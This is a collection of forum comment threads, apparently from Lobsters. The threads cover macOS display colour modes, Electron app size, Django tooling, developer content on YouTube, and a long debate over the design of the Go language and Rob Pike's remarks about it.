I believe it defaults to Y′CbCr only when a 10 bpc mode becomes available thanks to it, even if this means dropping down to 4:2:2 subsampling. Because 10 > 8 of course. This happens because of bandwidth restrictions and because RGB (or Y′CbC 4:4:4) uses 3xN bpp and 4:2:2 uses 2xN bpp. So 20 bpp < 24 bpp and it’s “10-bit” so macos considers it a win-win.
Thank you for pointing out BetterDisplay. I thought that’s just how HDMI displays looked on M–Series Macs under MacOS.
It will join the rest of the applications I have to use to make MacOS usable. (AutoRaise, Caffeine, MiddleClick,
RDM, Rectangle, SaneSideButtons/SensibleSideButtons)Can’t forget how each app has its own updater, and that those updaters will steal focus or at least have the anxiety-inducing bounce animation. (How does macOS not have focus stealing prevention?)
The bounce can be disabled in accessibility settings. Also AutoRaise can prevent focus stealing by forcing the window that the mouse is over to remain focused. But ideally auto-updaters and add-on apps would not be required, but that’s why I use linux outside of work.
Fascinating, I have 2 different models of 27” Dells, one via HDMI and one via HDMI in a small USB-C dock.
Both seem to be YCbCr (according to their OSDs) and I haven’t noticed anything wrong. I suppose they wouldn’t switch when I have them on the other computer, but it’s mDP and… not sure, DP probably
What drove me away during last foray into the macOS ecosystem was the beginnings of this trend. I had last used then-still-named OS X during Snow Leopard and Lion, and when I gave it a go in 2014 (I think Yosemite?), I found a bunch of my standard setup tweaks and tasks were no longer available unless you paid for some extra app store tool.
A bunch of my personal preferences went from being configurable options in a menu, to being hidden settings you could only enable via CLI, to requiring a third-party app I needed to install (and often to pay for). I am sad to hear that the trend has not abated.
I was (and still am to a lesser extent) an AI skeptic for writing code. Sonnet is what made me pay attention.
I’ve had some luck with v0 for UIs as well. Are there any other models that devs really like for software development?
DeepSeek R1 itself has really impressed me: https://simonwillison.net/2025/Jan/27/llamacpp-pr/
Claude is still my default, but if I have a problem that might benefit from “reasoning” about it - things like debugging a complex bug caused by code across multiple different files - I’ll try o1 or R2 and see if they can spot something that Claude doesn’t.
We’ve passed the inflection point. Deepseek wrote 99% of the code improving itself…
Well, one commit that was arguably rote according to some
My “TL;DR” summary:
Everyone does it, nobody cares, so it’s fine.
Slightly longer: the post asserts 4 main points. The author fails to adequately defend any of them. I feel that that the 3 main points he tries to defend all fail. I feel all 4 objections are valid and disagree with all of his attempted defences.
This is the attitude that enables enshittification: “most users” will keep using our product despite us degrading the experience.
The dev version of this: “$POPULAR_FRAMEWORK is popular, and it must be popular because it is good, therefore $POPULAR_FRAMEWORK is good.” If you lack the imagination to see literally any other way to implement it, the experience of using something else, or lack the ability to assess the tradeoffs, it is easy to fall into this trap. It is much cognitively cheaper to outsource the hard work of critically evaluating technology to other people. The problem arises when most everyone does the same thing, creating a closed system that stalls out at local maxima. (cough)
Think about the prevailing assessment that static types were worthless boilerplate that dominated the web discourse in the early 2010s. And then TS flipped that opinion around, where people swear by static types now. That collective everyone changed their mind, which was good. But it should also instill doubt in those paying attention whether that collective everyone’s takes are as infallible as they purport to be.
I totally agree. Specifically, people arguing over bundle size is ridiculous when compared to the amount of data we stream on a daily basis. People complain that a website requires 10mb of JS to run but ignore the GBs in python libs required to run an LLM – and that’s ignoring the model weights themselves.
There’s a reason why Electron continues to dominate modern desktop apps and it’s pride that is clouding our collective judgement.
https://bower.sh/my-love-letter-to-front-end-web-development
As someone who complains about Electron bundle size, I don’t think the argument of how much data we stream makes sense.
My ISP doesn’t impose a data cap—I’m not worried about the download size. However, my disk does have a fixed capacity.
Take the Element desktop app (which uses Electron) for example; on macOS the bundle is 600 MB. That is insane. There is no reason a chat app needs to be that large, and to add insult to injury, the UX and performance is far worse than if it were a native client or a Qt-based application.
Mine does and many ISPs do. Disk space is dirt cheap in comparison to bandwidth costs
Citation needed.
See native (Qt-based) Telegram client.
Is it because it uses Electron that the bundle size is so large? Or could it be due to the developer not taking any care with the bundle size?
Offhand I think a copy of Electron or CEF is about ~120-150MB in 2025, so the whole bundle being 600MB isn’t entirely explained by just the presence of that.
I’m not so sure… the “minimal” spotify build is 344 MB:
And if you decompress it (well, this is an older version but i don’t wanna downlod another just for a lobsters comment):
1.3 GB libcef.so, no slouch.
Hm. I may be looking at a compressed number? My source for this is that when the five or so different Electron-or-CEF based apps that I use on Windows update themselves regularly, each of them does a suspiciously similar 120MB-150MB download each time.
I don’t think the streaming data comparison makes sense. I don’t like giant electron bundles because they take up valuable disk space. No matter how much I stream my disk utilisation remains roughly the same.
Interesting, I don’t think I’ve ever heard this complaint before. I’m curious, why is physical disk space a problem for you?
Also “giant” at 100mb is a surprising claim but I’m used to games that reach 100gb+. That feels giant to me so we are orders of magnitude different on our definitions.
When a disk is getting full due to virtual machines, video footage, photos, every bit counts and having 9 copies of chromium seems silly and wasteful.
Also, the problem of disk space and memory capacity becomes worse when we consider the recent trend of non-upgradable/non-expandable disk and memory in laptops. Then the money really counts.
Modern software dev tooling seems to devolve to copies of copies of things (Docker, Electron) in the name of standardizing and streamlining the dev process. This is a good goal, but, hope you shelled out for the 1TB SSD!
At least games have the excuse of showing a crapload of eye candy (landscapes and all that).
Funny, even within this thread people are claiming Electron apps have “too much eye candy” while others are claiming “not enough”
I believe @Loup-Vaillant was referring to 3D eye candy, which I think you know is different from the Electron eye candy people are referring to in other threads.
A primary purpose of games is often to show eye candy. In other words, sure games use more disk space, but the ratio of
disk space actually used / disk space inherently required by the problem spaceis dramatically lower in games than in Electron apps. Context matters.I care because my phone has limited storage. I’m at a point where I can’t install more apps because they’re so unnecessarily huge. When apps take up more space than personal files… it really does suck.
And many phones don’t have expandable storage via sdcard either, so it’s eWaste to upgrade. And some builds of Android don’t allow apps to be installed on external storage either.
Native libraries amortize this storage cost via sharing, and it still matters today.
Does Electron run on phones? I had no idea, and I can’t find much on their site except info about submitting to the MacOS app store, which is different to the iOS app store.
Well, Electron doesn’t run on your phone, and Apple doesn’t let apps ship custom browser engines even if they did. Native phone apps are still frequently 100mb+ using the native system libraries.
It’s not Electron but often React Native, and other Web based frameworks.
There’s definitely some bloated native apps, but the minimum size is usually larger for the web based ones. Just shipping code as text, even if minified,is a lot of overhead.
Offhand I think React Native’s overhead for a “Hello world” app is about 4MB on iOS and about 10MB on Android, though you have to turn on some build system features for Android or you’ll see a ~25MB apk.
I am not convinced of this in either direction. Can you cite anything, please? My recollection is uncertain but I think I’ve seen adding a line of source code to a C program produce object code which was bigger by more bytes than the size of the source code line was bigger. And C is a PL which tends towards small object code size, and that’s without gzipping the source code or anything.
I don’t have numbers but I believe on average machine code has higher information density than the textual representation, even if you minify that text.
So if you take a C program and compile it, generally the binary is smaller than the total text it is generated from. Again, I didn’t measure anything, but knowing a bit about how instructions are encoded makes this seem obvious to me. Optimizations can come into play, but I doubt it would change the outcome on average.
That’s different to what I’m claiming. I’d wager that change caused more machine code to be generated because before some of the text wasn’t used in the final program, i.e. was dead code or not included.
Installed web apps don’t generally ship their code compressed AFAIK, that’s more when streaming them over the network, so I don’t think it’s really relevant for bundle size.
IPA and APK files are both zip archives. I’m not certain about iOS but installed apps are stored compressed on Android phones.
I’m not sure about APK, but IPAs are only used for distribution and are unpacked on install. Basically like a
.debDMG on macOS.So AFAIK, it’s not relevant for disk space.
FWIW phone apps that embed HTML are using WebView (Android) or WKWebView (iOS). They are using the system web renderer. I don’t think anyone (except Firefox for Android) is bundling their own copy of a browser engine because I think it’s economically infeasible.
Funnily enough, there’s a level of speculation that one of the cited examples (Call of Duty games) is large specifically to make storage crunch a thing. You already play Call of Duty, so you want to delete our 300GB game and then have to download it again later to play other games?
Learn Django and FastAPI. Also, learn three more. Learn that weird new thing that your friend at work keeps mentioning, and learn the up-and-comer you’ve seen make headlines each week. You don’t need to become an expert in all of them, but you can only make the choice “based on your project requirements” if you know what the options are at decision time.
One tool is a screwdriver and one is a can opener. Learn both.
This mentality works if you have a lot of free time. I think you should learn a thing deeply first before just spreading yourself like butter on a freshly toasted bagel. Otherwise you’re just noticing surface level differences and not differences in architectures and design decisions.
Learning one thing well is worth it. Once you start hating some of its decisions, you can try something else, and find that you hate it for different decisions it made. :)
Yes! People are always asking for excuses to not learn, but you should learn whatever interests you and more.
It “bothers” me a bit that alternatives to the Django admin are so scarce.
Also, because SPAs have a huge mindshare, most of the interesting work is happening in that space. Traditional server-side rendered apps, while having some resurgence thanks to HTMX and similar frameworks… well, there are established players, but it doesn’t feel like there’s much innovation. Perhaps traditional frameworks are stable and don’t really need more than slow evolution.
And the rift is a huge issue. I see there’s stuff to build using server-side rendering, but despite I don’t like SPA development, there’s plenty of stuff that is better as an SPA! (And we also lack more competition in Electron-style apps!)
Myself, when I look at FastAPI, I like it a lot. But most things I want to do, in my head they fit better server-side rendering better and I kinda always need something like the admin, so I still turn to Django frequently.
There’s something fundamental in the difference between a frontend dev who needs a backend and a backend dev who needs a SSR UI, and you see it reflected in the frameworks.
Frontend-oriented frameworks put most of their skill points in making sure that frontend dev is cozy, often with really nice live reloading via Vite. Full-stack frameworks say, “here’s a templating language.” Frontend frameworks say, “here’s the bare minimum needed to handle a web request.” Some full-stack frameworks get deep into the weeds with domain modeling and let you elegantly model a domain far beyond simple HTTP handlers. The worst situation to be in is when you can appreciate what both worlds offer you, as very few options exist that give you all the benefits here.
Personally, I do UI dev in Astro with the hyper fast hot reload, and move it over to templates for SSR. Domain modeling is too important to give up for me. I find I lose a lot of time trying to recreate things that you get for free in full stack frameworks.
But there’s a real opportunity for someone to cross the streams here. It’d probably have to be in TS, which isn’t my favorite language, or someone can figure out how to use React/Vue/Svelte components for SSR rendering.
You might be interested in django-ninja. It feels more like FastAPI than DRF does, uses pydantic, and lets you keep the batteries you like (including admin).
The thing is, I don’t use DRF either. Most of the things I do can be done with plain Django SSR and 0 APIs.
If I wanted to look at increasing UI sophistication, I think I would start with HTMX or a similar project.
If I really needed an API (and I can see scenarios for this, of course), then I would look at other options, yes.
It sounds like we might do similar things, then. I rarely need an API; when I do it’s just for one or two things, not for all of my UI.
I’ve used HTMX regularly for a little while now, including in production. In my production use of it, I used django-template-partials, and it’s pretty nice. I’ve been experimenting with cotton in some prototyping, and think I’ll probably use that in the future where I’m currently using template partials.
I worked through the hypermedia systems book using django and HTMX in public, and found the exercise extremely useful. I wrote about my work here. The nice thing is that the workflow for something enhanced with HTMX is so similar to the plain-old-templates I’m used to.
For exploratory programming, I have recently tried out NanoDjango a few times, and I really like it. It lets me keep all the admin goodness I like about django but really lowers the impedence for trying something out quickly. And its “convert” command turns things into a normal django project if I decide they need to have a longer useful life.
When you mentioned that you liked the look of FastAPI, I was thinking about the API part. But NanoDjango gets at that low-impedance feeling for starting a project.
Huh, NanoDjango looks intriguing, I’ll look at it, thanks.
The last times I’ve dabbled with Django I had a few goes at trying to make the first steps experience a bit smoother; like incorporate
dj-django-url,uv, and a few other odds and ends that end up being boilerplate-ish for having an easy-to-deploy, smooth initial setup. Likely there’s a million other better approaches out there with more polish, but… it’s how we are.How we manage applications has changed pretty significantly. We don’t need custom solutions much anymore with SPAs and static file hosting.
The Django admin is a rapid CRUD framework with (primitive) change tracking and some authorization support.
This is not only hugely useful, but it even encourages you to store in the database stuff that you would otherwise hardcode in the source code.
It is not perfect by any means, but there’s very few things like it, and for many projects, it puts you one step ahead in productivity.
…
I have certainly switched some stuff to be based in source code and use a Git forge’s support for editing files via a web UI with code review for some purposes, so there’s a small overlap, but still a lot of things I do benefit from the admin.
Case in point; I wrote a small scraper to collect versions from upstream projects and their YunoHost package. I use a Django admin to maintain scraping exceptions. It’s great. I could edit a YAML via the forge web UI, or just with my local editor + git, but in this case, it works so much better.
I guess a difference in opinion, I’d prefer something like that to be checked in and linted, or have logic in the app itself to confirm exceptions are valid inputs.
I was looking for this in Nest and found a project half a decade unmaintained. There was a newfangled Rust framework who had this on their roadmap kinda.
Most people say that given an OpenAPI spec it should be ‘easy’ to create a generic web CRUD editor for it, but nobody seems to be able to be bothered to build one that is usable.
What’s Nest?
Yes, the most brilliant minds of our generation are ignoring this problem. The “optimist” answer is that you cannot really make CRUD nicer than what it is. (E.g: there’s so much variation that CRUD frameworks will always have narrow use cases.)
I have written two CRUD frameworks. The first one got along quite far, with many sophisticated features, but it had some basic flaws. My second one has a stronger foundation, and indeed it still powers one personal app… but I never had the need to develop more features… so I still rely on Django for most things :(
Coming from Django I can’t emphasise how much of a step down this pile of crap is (but that is the TS/JS culture that this is considered good and popular): https://nestjs.com
i wonder if i’ll live to see the day where we can talk about a language without putting a different language down
The YouTube channel here seems to be a person who needs to be dramatic for view reasons. I think the actual content, and the position of the Ghostty author here on this topic, is pretty mild.
An actual bit from the video:
Guest: “…I don’t know, I’m questioning everything about Go’s place in the stack because […reasonable remarks about design tradeoffs…]”
Host: “I love that you not only did you just wreck Go […]”
Aside… In the new year I’ve started reflexively marking videos from channels I follow as “not interested” when the title is clickbait, versus a succinct synopsis of what the video is about. I feel like clickbait and sensationalism on YouTube is out of control, even among my somewhat curated list of subscribed channels.
This is why I can’t stand almost any developer content on YouTube and similar platforms. They’re way too surface-level, weirdly obsessed with the inane horse race of finding the “best” developer tooling, and clickbait-y to a laughable degree. I have >20 years of experience, I’m not interested in watching someone blather on about why Go sucks when you could spend that time on talking about the actual craft of building things.
But, no, instead we get an avalanche of beginner-level content that lacks any sort of seriousness.
This is why I really like the “Developer Voices” channel. Great host, calm and knowledgeable. Interesting guests and topics. Check it out if you don’t know it yet.
Very nice channel indeed. Found it accidentally via this interview about Smalltalk and enjoyed it very much.
Do you have other channel recommendations?
I found Software Unscripted to pretty good too. Not quite as calm as Developer Voices, but the energy is positive.
Thanks! Didn’t know Richard Feldman hosted a podcast, he’s a good communicator.
Signals and Threads is another great podcast, albeit doesn’t seem to have a scheduled release
Thanks for the suggestion. I will check it out!
I’m in a similar boat. Have you found any decent channels that aren’t noob splooge? Sometimes I’ll watch Asahi Lina, but I haven’t found anything else that’s about getting stuff done. Also, non-OS topics would be nice additions as well.
As someone else said, Developer Voices is excellent, and the on the opposite end of the spectrum from OP.
Two more:
The Software Unscripted podcast publishes on YouTube too, and I enjoy it a fair bit at least in the audio only format.
Book Overflow, which focuses on reading a software book about once every two weeks and talking about it in depth.
7 (7!) Years ago LTT made a video about why their thumbnails are so… off putting and it essentially boiled down to “don’t hate the player; hate the game”. YouTube rewards that kind of content. There’s a reason why nearly every popular video these days is some variant of “I spent 50 HOURS writing C++” with the thumbnail having a guy throwing up. If your livelihood depends on YouTube, you’re leaving money on the table by not doing that.
It’s not just “Youtube rewards it”, it’s that viewers support it. It’s a tiny, vocal minority of people who reject those thumbnails. The vaaaaast majority of viewers see them and click.
I don’t think you can make a definitive statement either way because YouTube has its thumb on the scales. Their algorithm boosts videos on factors other than just viewer click through or retention rates (this has also been a source of many superstitions held by YouTubers in the past) and the way the thumbnail, title and content metas have evolved make me skeptical that viewers as a whole support it.
What is the alternative? That they look at the image and go “does this person make a dumb face” ? Or like “there’s lots of colors” ? I think the simplest explanation is that people click on the videos a lot.
…or it’s just that both negative and positive are tiny slices compared to neutrals but the negative is slightly smaller than the positive.
(I use thumbnails and titles to evaluate whether to block a channel for being too clickbait-y or I’d use DeArrow to get rid of the annoyance on the “necessary evil”-level ones.)
then you have chosen poorly.
No, I think it’s okay for people to make great content for a living.
I am quite happy to differ in opinion to someone who says ‘great content’ unironically. Anyway your response is obviously a straw man, I’m not telling Chopin to stop composing for a living.
Your personal distaste for modern culture does not make it any higher or lower than Chopin, nor does it invalidate the fact that the people who make it have every right to make a living off of it.
They literally don’t have a right to make a living from Youtube, this is exactly the problem. Youtube can pull the plug and demonetise them at any second and on the slightest whim, and they have absolutely no recourse. This is why relying on it to make a living is a poor choice. You couldn’t be more diametrically wrong if you tried. You have also once again made a straw man with the nonsense you invented about what I think about modern culture.
How’s that any different from the state of the media industry at any point in history? People have lost their careers for any reason in the past. Even if you consider tech or any other field, you’re always building a career on top of something else. YouTube has done more to let anyone make a living off content than any other stage in history, saying you’re choosing poorly to make videos for YouTube is stupid.
You’re the one who brought it up:
Isn’t this kind of a rigid take? Why is depending on youtube a poor choice? For a lot of people, I would assume it’s that or working at a fast-food restaurant.
Whether that’s a good long-term strategy, or a benefit to humanity is a different discussion, but it doesn’t have to necessarily be a poor choice.
Not really?
I mean sure if you’ve got like 1000 views a video then maybe your livelihood depending on YouTube is a poor choice.
There’s other factors that come into this, but if you’ve got millions of views and you’ve got sponsors you do ad-reads for money/affiliate links then maybe you’ll be making enough to actually “choose” YouTube as your main source of income without it being a poor choice (and it takes a lot of effort to reach that point in the first place).
We’ve been seeing this more and more. You can, and people definitely do, make careers out of YouTube and “playing the game” is essential to that.
Heh - I had guessed who the host would be based on your comment before I even checked. He’s very much a Content Creator (with all the pandering and engagement-hacking that implies). Best avoided.
Your “ghostty author” literally built a multibillion dollar company writing Go for over a decade, so Im pretty sure his opinion is not a random internet hot take.
Yup. He was generally complimentary of Go in the interview. He just doesn’t want to use it or look at it at this point in his life. Since the Lobsters community has quite an anomalous Go skew, I’m not surprised that this lack of positivity about Go would be automatically unpopular here.
And of course the title was click-baity – but can we expect from an ad-revenue-driven talk show?
My experience is that Lobste.rs is way more Rust leaning than Go leaning, if anything.
We have more time to comment on Lobsters because our tools are better ;)
Waiting for compile to finish, eh?
Hahahahaha. Good riposte!
I was able to get the incremental re-builds down to 3-5 seconds on a 20kloc project with a fat stack of dependencies which has been good enough given most of that is link time for a native binary and a wasm payload.
cargo checkviarust-analyzerin my editor is faster and does enough for my interactive workflow most of the time.Yeah, Haskell is so superior to Rust that’s not even fun at this point.
It’s funny you say that because recently it seems we get a huge debate on any Go-related post :D
First thought was “I bet it’s The Primeagen.” Was not disappointed when I clicked to find out.
Don’t be a drama queen ;-) You can, all you want. That’s what most people do.
The host actually really likes Go, and so does the guest. He built an entire company where Go was the primary (only?) language used. It is only natural to ask him why he picked Zig over Go for creating Ghostty, and it is only natural that the answer will contrast the two.
i can’t upvote this enough
Still rocking an iPhone 12 mini. The modern web can be pretty brutal on it at times: pages crashing, browser freezing for 10s at a time. It has honestly curtailed my web use on the go significantly, so I’m mostly okay with it on the whole.
Most things I absolutely need I can get an app for that will run better usually. The only real issue is the small screen size is obviously not being designed for anymore, and that’s becoming more of an issue.
I didn’t realize how many apps were essentially web applications until I enabled iOS lockdown mode. Suddenly I was having to add exceptions left and right for chat apps, my notes app, my Bible app, etc.
But even web-powered apps do seem snappier than most websites. Maybe they’re loading less advertising/analytics code on the fly?
I’m on a 2022 iPhone SE, and feel the same way. (My screen may be a bit smaller than yours?) The device is plenty fast, but it’s becoming increasingly clear that neither web designers nor app developers test much if at all on the screen size, and it can be impossible to access important controls.
TBH, I would cheerfully carry a flip phone with the ability to let other devices tether to it for data connectivity. Almost any time I really carry about using the web, I have a tablet or a laptop in a bag nearby. A thing that I could talk on as needed and that could supply GPS and data to another thing in my bag would really be a sweet spot for me.
Maybe you want a Lightphone? They can tether.
That is exactly the kind of thing I’d like. I’d probably need to wait for the 5G version, given the 4G signal strength in a few of the places I tend to use data.
that was just 30 seconds off the top of my head.
go is great if you are an amateur with no taste, like 99% of google employees.
Gotta say, it’s a bad look to just throw out insults like “go is great if you are an amateur”. Clearly many non-amateurs use it effectively.
I think you can be better.
In the most charitable interpretation, it’s only a restatement of something from the article:
So you could even argue that “Go being great if you’re an amateur with no taste” was an explicit design goal, and perhaps we should ask Rob Pike to be better.
Ah, the good “everyone who disagrees is dumb and uncivilized” argument.
As we all know that Pike, Thompson, Griesemer, Cox, et al have no idea of what they’re doing.[/irony]
It’s fine to disagree on things, have different opinions and criticism. Heck, that’s how people decide what language they wanna use. But the reason there are more than a hand full of languages with different designs is probably not that everyone else is dumber than you.
And should “amateur” in fact not be meant as an insult, then the argument essentially becomes “to use zig you have to be smart, and not make mistakes” which judging by your other comments regarding doesn’t seem to your opinion either.
Trying to give you the benefit of the doubt here, since other than me personally not liking certain design choices I think Zig seems like a great project overall.
Go was explicitly designed for fresh university graduates at google, thus, amateurs. And as Pike himself says, quoted in the linked article, for people with no taste (“They’re not capable of understanding a brilliant language”). Andrew’s assessment is completely fair.
That Pike quote has been used as a stick to beat him with since 2012. I have a note about it.
It’s from a talk, so likely extemporised.
Here’s the full quote:
Source:
http://channel9.msdn.com/Events/Lang-NEXT/Lang-NEXT-2014/Fro…
https://talks.golang.org/2012/splash.article
While it’s nice to see the full quote, it doesn’t invalidate what I said, nor do I feel the sentiment is all too different in it’s full context.
I think it’s pejorative to state that recent CS graduates who have started working at Google before 2012 “have no taste”. No experience at writing production software at scale, sure. But software development is so much more than language.
I haven’t watched the talk, so I don’t know if the term “brilliant language” is used semi-ironically. Neither C, Java, nor COBOL for that matter are considered “brilliant”, but they have been used to write a lot of software. There’s a law of large numbers in play when it comes to writing software at scale which means that you neccesarily have to cater to the lowest common denominator of developers, which even at Google at its prime was probably lower than the average commenter here ;)
I am fully in agreement that Golang was probably a great fit for Google, and maybe still is. Its popularity outside Google is probably due to good marketing, “if we copy Google we too will succeed”, and a genuine demand for a “C-like with garbage collection and concurrency”.
For outside Google use, that last part “C-like with garbage collection” is I suggest a big part of its appeal. If one is already aware of how to write reasonable C, it is a useful mechanism to have, and less risky for small to medium sized companies than depending upon D.
If one has folks who are familiar with C, and have a problem to tackle which does not not require manual memory management, nor the tricky performance things C is often used for, then it seems an obvious option. Without dragging in a lot of the pitfalls of C++, or complexities of other languages. I’ve occasionally proposed it in such cases.
I have actually chosen to use Go for one project, specifically because of its good CSP support, as the problem domain lend itself to such a design approach. However one had to be aware to avoid certain risks: lack of immutable pointers for sends over channels, ensuring one nil’ed a pointer after sending (moving ownership), being wary of sending structs containing slices, avoiding accidental mutable captures in spawning goroutines from interior functions, etc.
Despite that it was still the easiest approach to sharing work on said program with others not familiar with the CSP approach. In many ways one can view Go as the Alef with a GC which Pike wanted Winterbottom to make, for CSP tasks it reasonably serves in that role. However it would (IMHO) be better if it had a few more of the issues I mention above addressed; that’ll have to wait for some future language.
As to general concurrency, I’ve seen a lot of Go written in a threads + mutex protecting structs style which one often sees in C and C++, so I suspect most people are not taking the effort to analyse in the CSP style, or more likely are simply unaware of it.
You are saying a lot of things, but what’s your point? Nothing of that invalidates the original statement.
My point is that constantly quoting a 12 year old remark as an anti-golang trope is lazy and borderline intellectually dishonest.
I think Rob Pike knows more about Google’s workforce than most of his detractors do - and that hiring a bright young person directly from university does not give you a seasoned software developer. I also believe that an appreciation for “brilliant languages” in relation to software development is something that is developed over time, at which time the person hired by Google is probably doing something more valuable to the company bottom line than writing code.
I don’t think it’s intellectually dishonest to bring up a rude and dismissive quote from one of the designers of golang stating that golang is a dumbed-down language because its target userbase is too stupid to understand a better language.
I disagree. Disliking a language because it has multiple technical issues, like others have pointed out in this thread and others, is defensible. Disliking it because its creator said something inappropriate is not.
Even the most generous reading I can muster for Pike’s infamous remarks is something like “we want new graduates with limited breadth and depth of experience to be able to make productive contributions without having to learn a lot of new stuff.” I think the criticism of Go that is pegged to Pike’s remarks is not dislike because of what he said, it’s that its deficiencies exist in part because of the design goals these remarks lay bare. The remarks provide evidence that Go’s design was targeted at novices (“amateurs with no taste”, if you like) from whom economic productivity is expected immediately, rather than professionals with an unbounded capacity for learning and independent interest in doing excellent work.
Maybe. I still think a bunch of nerds got really angry at Pike because they didn’t get jobs at Google back in the day despite being fluent in Haskell, and they will never forget nor forgive.
I have another reason to think Pike’s quote is unattractive: it’s devious rhetoric.
He indirectly acknowledges that Go lacks a bunch of good features, fair enough. But then he insinuates that that is because those features are hard to understand (require devs “capable of understanding a brilliant language”). That is wrong on the facts, at least in the case of sum types. It is also rude: he uses the word “brilliant” as a synonym for ‘hard to understand’. That is a ‘back-handed compliment’, which is another word for ‘insult’ in the brilliant English language ;-) .
As for its relevance to Go: sure, the quote is not enough to condemn Go. But it suggests the big mistake (nil) that Go’s designers did, in fact, go on to make. Which is why there is so much cause to quote it.
The context here is about how Go was designed. A quote from the creator of the language about how it was designed at a time when it was designed seems like the most appropriate thing possible to bring up.
I agree with your second paragraph, but I see no relation to the first one. The language was designed in a certain way for certain reasons. If that was yesterday or 12 years ago does not really matter when looking at the lifecycle of the typical programming language.
Even within Google, Java is significantly bigger/more used than Go, and frankly, I don’t see much difference in their design goals. I would even say that Java is a better “Go” than Go itself - it has better concurrency primitives, now has virtual threads, very simple language with utmost care for backwards compatibility. And it is already over its growing pains (which one would think go could have easily avoided by learning from these..) - it is expressive, but not in the “redefine true to false” kind of dangerous way, has good enough generics, etc.
Also, all that development into Java’s GCs can really turn the tables in a naive performance comparison - sure, value types can make the life of the Go GC easier, but depending on workload it may not be enough to offset something like the beast G1GC is - especially in server environments where RAM is plentiful (and often have to be plentiful).
Hmm, that’s odd. Your note almost literally quotes [a Hacker News comment]((https://news.ycombinator.com/item?id=18564643), right down to the truncated link text ending in
...; but the second link was introduced with the crucial words “And there are other hints on”, and those are missing.Anyway,
You’re correct, this is from the HN comment thread, which seems to be ground zero for the quote.
Thanks for clearing up the links, and thanks for the Youtube link with timestamp.
https://lobste.rs/s/tlmvrr/i_m_programmer_i_m_stupid#c_itjpt0 I noticed the same thing.
Great comment, I’ll add it to my notes about the quote.
What does “explicitly designed” mean in this context? This feels a lot like saying Python has explicitly designed as a teaching language and C explicitly for Unix, etc.
Also I’d argue that Go - despite Google - is a lot more in the tradition of Limbo, Alef and Newsqueak.
Google plus university students sounds a lot more than Python and Java, languages already used a lot by Google.
Anyways, let’s stick to the criticism. Let’s take Limbo. Limbo is rather close to Go. Just quite a bit more niche for many reasons. However to the best of my knowledge it wasn’t “explicitly designed for fresh university graduates”, certainly not at Google which didn’t exist at the time.
Is that also a language for amateurs with no taste?
I mostly ask, because the specific context “people working at Google” under which it was created seems to be overly present in the argument, yet we talk about it largely as people who didn’t work at Google. Also Go is largely used by amateurs (compared to Python, JavaScript, etc.) seems at least debatable.
And to be clear: I hate the fact that Google seemingly at some point decided to exert a lot more control. Honestly, I even dislike the fact that Go was created at Google. The main reason I got interested in the language originally was that I tend to like software designed by the Plan 9 crowd. The fact that it was less niche - and that’s Google’s “fault” - as well as promised stability in a time where programming languages seem to largely designed like fashion, where one just adds what’s currently on-vogue piling up “old ways of doing things” until enough cruft is accumulated for everyone to leave the sinking ship of “sounds good on paper” ideas and code bases where you can tell when they were written depending on which feature was new and hip at the time. See Java’s OO features, JavaScript’s million ways to write simple loops. Pike’s talks on how Go is essentially finished, with only generics remaining[1] and focus shifting to libraries, compiler, GC, etc. seemingly confirmed that. Then Pike got quiet and Google replaced the Go website with a heavily Google branded one.
So in that sense I get where things come from. However, if you look at Go it’s also a clear next step from previous languages in the spirit of Alef, Newsqueak and Limbo. Channels exist in all of them and might be the thing that was copied the most. So that “awful, buggy concurrency primitive” has a history going back to the 80s and Go is currently the reason it’s been copied so much into other languages.
Why not say that then?
Wikipedia on amateur:
Someone who formally studied something for three years seems like a stretch. But even then, that disregards the reality of Go usage completely.
I don’t see how “having no taste” is “a fair assessment”.
Neither says “Go was designed for” nor “fresh university graduates”. And google employees in this sentence sounds more like an example of people who are amateurs with no taste. But even if not, I don’t see how this can be interpreted in a nice/factual without losing any meaning. Let’s say Go was designed for Google employees. How is that different from Python being designed for teaching and other such things, and what does it say about the language? Is that a criticism? Why would one not want an easy to understand language?
If it’s just about it being technically correct (which seems like a stretch as described above) then what’s the thing the sentence wants to convey? In the context I’d expect it to be a criticism.
[1] look it up, their website mentioned they’d add them from pre 1.0 days and that statement only was changed after they added them. Just to counter the wrong trope of “they finally convinced them”.
I feel like this is sort-of correct. They are all quite competent, but I don’t think any of them have good ideas when it comes to language design. On the other hand I don’t think I say that I agree with Andrew on language design, since I find Zig a bit Goish. There’s a lot of skill behind it and its ideas are being executed well, I just think the ideas come together into something that I feel isn’t particularly good. Obviously quite a few people like Zig and are creating great stuff with it, but the same is true of Go.
As someone who is fairly content with go (mostly due to disillusionment with everything, certainly including go), and who hasn’t used zig, can you explain to me what you don’t like about zig and how it all comes together?
Come on, Andrew! No need to beat around the bush. Tell us how you really feel!
I feel like we live in a tech dystopia and I’m mad about it.
Borrowing Dan Luu’s words:
“People basically just accept that software has a ton of bugs and that it’s normal to run into hundreds or thousands of software bugs in any given week”
“widely used software is frequently 100000x slower than it could be if it were highly optimized”
Arguably it’s mainly societal pressures that create this incentive structure, however, the widespread use of a programming language as undisciplined as Go certainly factors into it.
And I’m happy to send a stray shot at Google any time for all the evil & advertisements they inflict on us.
Your language is less memory safe than Go.
What does that have to do with discipline? Erlang doesn’t have data races. Is Erlang now better than Go? (I mean, yes, but not the point.)
Depends on your definition of “discipline” in a language. Go loses points for: nil pointers, slice/map/channel footguns, no enums/sum types. It gains points for some type safety, memory safety, first-class testing and benchmarking tooling.
I’m not familiar with Erlang but no data races is a clear advantage over Go’s approach to concurrency. Rust is probably the most disciplined language for my own definition of disciplined (too disciplined for some domains like game dev).
Go should only receive partial credit for memory safety. Most sources of memory unsafety are not present in Go, but since data races can result in memory unsafety in Go, it cannot be said to be a memory safe language. There are two approaches to fixing this: the Java way, which is to make it so that data races can’t result in memory unsafety, and the Rust way, which is to make it so that data races can’t happen.
Or the Erlang way: data can only be copied, not shared.
It seems a fair tradeoff, given it often compiling to smaller and more efficient binaries than C itself.
On the other hand, Go not being memory safe with its choice of tradeoffs (middle of the pack performance with the productivity of a GC) is a very sad fact of life. (It can Segfault on race conditions, while similar languages, like java, might corrupt a given object, but that will still be well-defined java code and the runtime can just chug along).
Surely segfaulting, crashing the process, and restarting it is preferable to continuing with some internal object in an invalid/corrupt/wrong state? Not that Go is guaranteed to crash for a data race updating a map.
The former fixes the problem, the latter allows it to continue to propagate.
Segfaulting is the happy case, but it’s up to the OS to detect, not Go (more or less).
What’s much more likely is that it silently corrupts either the user’s application state, or even worse, the runtime’s state, which can yield a completely unexpected error down the line which will be impossible to debug.
Quite.
